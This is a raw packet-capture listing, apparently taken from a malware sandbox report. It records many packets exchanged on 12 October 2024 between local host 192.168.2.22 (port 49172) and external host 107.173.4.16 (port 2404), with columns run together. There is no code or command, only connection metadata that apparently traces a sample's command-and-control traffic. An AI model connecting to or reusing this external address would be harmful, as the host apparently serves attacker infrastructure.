                                                                Oct 12, 2024 16:40:04.096374035 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096379995 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096391916 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096410036 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096616030 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096658945 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096714973 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096729994 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096745014 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096760035 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096774101 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096781969 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096792936 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096797943 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096816063 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096829891 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096837044 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096846104 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096862078 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096864939 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096878052 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096894979 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096901894 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096930027 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.097543001 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.097557068 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.097595930 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.113960028 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.177896023 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.177922010 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.177938938 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.177954912 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.177969933 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.177972078 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.177984953 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.177989960 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178008080 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178021908 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178037882 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178045988 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.178056002 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178071976 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178088903 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178097010 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.178105116 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178122044 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178134918 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178147078 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.178153992 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178170919 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178179026 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.178190947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178206921 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.178231001 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180067062 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180094004 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180111885 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180116892 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180166006 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180169106 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180182934 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180201054 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180216074 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180243969 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180243969 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180262089 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180289030 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180300951 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180304050 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180320978 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180336952 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180346012 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180363894 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180377960 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180381060 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180397034 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180412054 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180428028 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180437088 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180445910 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180480957 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180509090 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180532932 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180546045 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180551052 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180567980 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180583954 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180598974 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180605888 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180617094 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180633068 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180651903 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180664062 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180677891 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180701971 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180707932 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180718899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180736065 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180764914 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180768967 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180783987 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180800915 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180810928 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180816889 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180835009 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180843115 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180851936 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180869102 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.180879116 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.180910110 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181014061 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181030035 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181045055 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181061029 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181062937 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181077003 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181118011 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181183100 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181220055 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181236982 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181252956 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181267977 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181292057 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181327105 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181354046 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181370020 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181372881 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181386948 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181402922 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181418896 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181427002 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181436062 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181452036 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181467056 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181473970 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181483984 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181499958 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181504011 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181515932 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181557894 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181698084 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181716919 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181734085 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181760073 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181770086 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181777954 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181794882 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181809902 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181821108 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181826115 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181843042 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181854010 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181859970 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181885004 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181885958 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181900978 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181916952 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181926012 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181931973 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181951046 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181960106 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.181967020 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181982994 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.181998968 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182004929 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.182015896 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182032108 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182048082 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182054043 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.182064056 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182080030 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182101965 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.182585001 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182612896 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182630062 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182634115 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.182645082 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.182679892 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.190440893 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266568899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266587019 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266603947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266618013 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266634941 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266645908 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266680956 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266705036 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266721964 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266737938 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266752958 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266761065 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266768932 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266784906 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266789913 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266803980 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266819954 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266844034 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266855001 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266871929 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266887903 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266905069 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266907930 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266921043 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266937971 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266954899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266957045 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.266973019 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.266985893 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.267009020 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.268767118 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268781900 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268798113 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268821955 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268826008 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.268836975 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.268838882 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268856049 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268872023 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268876076 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.268887997 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268904924 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268919945 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268929005 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.268935919 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.268959045 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269022942 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269046068 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269061089 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269076109 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269090891 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269090891 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269105911 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269115925 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269124985 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269145966 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269212961 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269237995 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269262075 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269277096 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269295931 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269304991 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269304991 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269323111 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269332886 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269336939 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269360065 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269391060 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269406080 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269421101 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269432068 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269440889 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269458055 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269491911 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269505978 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269630909 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269675970 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269701004 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269715071 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269728899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269741058 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269746065 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269763947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269764900 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269778013 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269793034 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269809008 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269823074 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269838095 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269838095 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269848108 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269864082 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269887924 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269898891 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269906998 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269932032 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269946098 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269962072 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269965887 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.269979954 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.269994974 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270009995 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270016909 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270026922 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270044088 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270066977 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270085096 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270100117 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270124912 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270140886 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270143986 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270162106 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270195007 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270215034 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270231962 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270246983 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270343065 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270404100 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270421028 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270436049 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270451069 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270467043 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270473957 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270483971 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270499945 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270515919 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270519018 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270531893 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270548105 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270562887 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270567894 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270596027 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270631075 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270680904 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270698071 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270715952 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270740032 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270754099 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270755053 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270771980 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270808935 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270812988 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270831108 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270847082 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270860910 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270876884 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270880938 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270893097 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270909071 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270915031 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.270926952 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270944118 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270957947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.270962000 CEST491722404192.168.2.22107.173.4.16
